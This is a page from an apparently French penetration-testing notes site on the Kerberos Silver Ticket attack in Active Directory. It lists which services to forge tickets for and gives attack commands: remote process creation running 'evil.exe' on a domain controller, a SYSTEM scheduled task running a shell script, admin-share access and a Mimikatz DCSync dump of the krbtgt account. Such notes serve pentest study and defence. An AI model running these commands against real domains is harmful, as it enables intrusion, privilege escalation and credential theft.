Bebzounettes
Active Directory
Systems
Web
Applicatives vulnerabilities
- Buffer-Overflow
Thick Client
- Thick Client Methodology
Wireless Security
Network
Physical Access
Forensic
- Outils de Forensic
Information gathering
- Scans
Services
Github Repos
- Repos Github
Blog
Contact

Powered by GitBook

On this page

Was this helpful?

Silver Ticket

PreviousGolden Ticket NextSkeleton Key

Last updated 3 years ago

Service à cibler lors de demande de TGS :

Type de service

Service Silver Ticket

Attaques

SWMI

HOST + RPCSS

wmic.exe /authority:"kerberos:DOMAIN\DC01" /node:"DC01" process call create "cmd /c evil.exe"

Powershell Remoting

HTTP + WSMAN

New-PSSESSION -NAME PSC -ComputerName DC01; Enter-PSSession -Name PSC

WinRM

HTTP + WSMAN

New-PSSESSION -NAME PSC -ComputerName DC01; Enter-PSSession -Name PSC

Scheduled Tasks

HOST

schtasks /create /s dc01 /SC WEEKLY /RU "NT Authority\System" /IN "SCOM Agent Health Check" /IR "C:/shell.ps1"

Windows File Share (CIFS)

CIFS

dir \dc01\c$

LDAP operations including Mimikatz DCSync

LDAP

lsadump::dcsync /dc:dc01 /domain:domain.local /user:krbtgt

Windows Remote Server Administration Tools

RPCSS + LDAP + CIFS